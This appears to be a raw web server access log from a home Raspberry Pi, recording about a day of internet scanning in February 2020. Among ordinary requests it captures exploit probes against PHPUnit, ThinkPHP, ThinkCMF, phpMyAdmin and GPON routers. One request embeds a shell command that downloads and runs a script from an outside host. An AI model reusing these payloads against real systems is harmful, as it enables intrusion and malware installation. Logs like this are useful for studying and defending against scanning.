Wed Feb 5 06:25:06 MST 2020 06:25:06 up 4 days, 18:28, 1 user, load average: 0.34, 0.26, 0.21 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Fri11 4days 4:00 1.12s /usr/bin/lxsession -s LXDE-pi -e LXDE 5.101.0.209 - - [05/Feb/2020:13:44:34 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 177.84.90.56 - - [05/Feb/2020:14:22:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.234.239.167 - - [05/Feb/2020:14:23:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 196.52.43.61 - - [05/Feb/2020:14:57:01 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 70.32.0.61 - - [05/Feb/2020:15:15:14 +0000] "GET /tmpfs/snap.jpg?usr=admin&pwd=admin HTTP/1.1" 404 0 "" "python-requests/2.21.0" 70.32.0.61 - - [05/Feb/2020:15:15:14 +0000] "GET /tmpfs/snap.jpg?usr=user&pwd=user HTTP/1.1" 404 0 "" "python-requests/2.21.0" 145.255.5.53 - - [05/Feb/2020:16:24:36 +0000] "GET / HTTP/1.1" 400 0 "" "" 51.89.229.158 - - [05/Feb/2020:16:31:11 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.89.229.158 - - [05/Feb/2020:16:31:12 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 189.235.69.228 - - [05/Feb/2020:18:03:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 80.82.70.118 - - [05/Feb/2020:18:18:30 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 222.186.19.221 - - [05/Feb/2020:19:08:38 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 185.202.129.4 - - [05/Feb/2020:20:53:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 92.39.140.50 - - [05/Feb/2020:21:01:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 197.232.246.58 - - [05/Feb/2020:21:10:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 193.57.40.38 - - [05/Feb/2020:22:29:49 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [05/Feb/2020:22:29:49 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [05/Feb/2020:22:29:49 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.57.40.38 - - [05/Feb/2020:22:34:51 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 2.235.234.64 - - [05/Feb/2020:22:37:41 +0000] "GET / HTTP/1.1" 400 0 "" "" 193.57.40.38 - - [05/Feb/2020:22:46:49 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.3.8.162 - - [05/Feb/2020:23:26:07 +0000] "GET / HTTP/1.1" 200 25000 "" "" 167.71.76.94 - - [06/Feb/2020:00:35:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu" 167.71.76.94 - - [06/Feb/2020:00:35:02 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 167.71.76.94 - - [06/Feb/2020:00:35:02 +0000] "GET /phpmyadmin/scripts/setup.php/index.php HTTP/1.1" 404 0 "" "ZmEu" 167.71.76.94 - - [06/Feb/2020:00:35:03 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 167.71.76.94 - - [06/Feb/2020:00:35:03 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 167.71.76.94 - - [06/Feb/2020:00:35:03 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 167.71.76.94 - - [06/Feb/2020:00:35:04 +0000] "UNKNOWN HTTP/0.9" 400 0 "" "" 119.65.255.134 - - [06/Feb/2020:01:21:17 +0000] "GET / HTTP/1.1" 400 0 "" "" 128.14.133.58 - - [06/Feb/2020:01:53:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 109.232.49.248 - - [06/Feb/2020:02:14:37 +0000] "GET / HTTP/1.1" 400 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:20 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:21 +0000] "GET / HTTP/1.1" 200 25000 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:21 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:22 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:22 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:22 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:23 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 206.189.19.57 - - [06/Feb/2020:02:56:23 +0000] "GET //Admin/scripts/setup.php HTTP/1.1" 400 0 "" "" 176.113.115.95 - - [06/Feb/2020:03:07:32 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 176.113.115.95 - - [06/Feb/2020:03:07:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 176.113.115.95 - - [06/Feb/2020:03:07:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.145.255.59 - - [06/Feb/2020:03:40:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.145.255.59 - - [06/Feb/2020:03:40:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [06/Feb/2020:03:46:04 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 221.130.11.151 - - [06/Feb/2020:03:48:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 117.247.90.100 - - [06/Feb/2020:04:44:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 91.202.199.174 - - [06/Feb/2020:04:45:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 149.6.199.177 - - [06/Feb/2020:06:38:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 2.132.94.96 - - [06/Feb/2020:09:02:37 +0000] "GET / HTTP/1.1" 400 0 "" "" 85.103.250.173 - - [06/Feb/2020:09:03:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 208.115.198.2 - - [06/Feb/2020:10:39:49 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.115.198.2 - - [06/Feb/2020:10:39:49 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 49.82.18.249 - - [06/Feb/2020:10:48:47 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World" 80.210.18.224 - - [06/Feb/2020:11:28:35 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 80.210.18.224 - - [06/Feb/2020:11:28:35 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 51.89.229.158 - - [06/Feb/2020:11:50:47 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.89.229.158 - - [06/Feb/2020:11:50:47 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 122.228.19.79 - - [06/Feb/2020:12:31:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 91.205.24.180 - - [06/Feb/2020:13:04:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.101.0.209 - - [06/Feb/2020:13:12:03 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" Thu Feb 6 06:25:05 MST 2020 06:25:06 up 5 days, 18:28, 1 user, load average: 0.21, 0.23, 0.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Fri11 5days 4:35 1.12s /usr/bin/lxsession -s LXDE-pi -e LXDE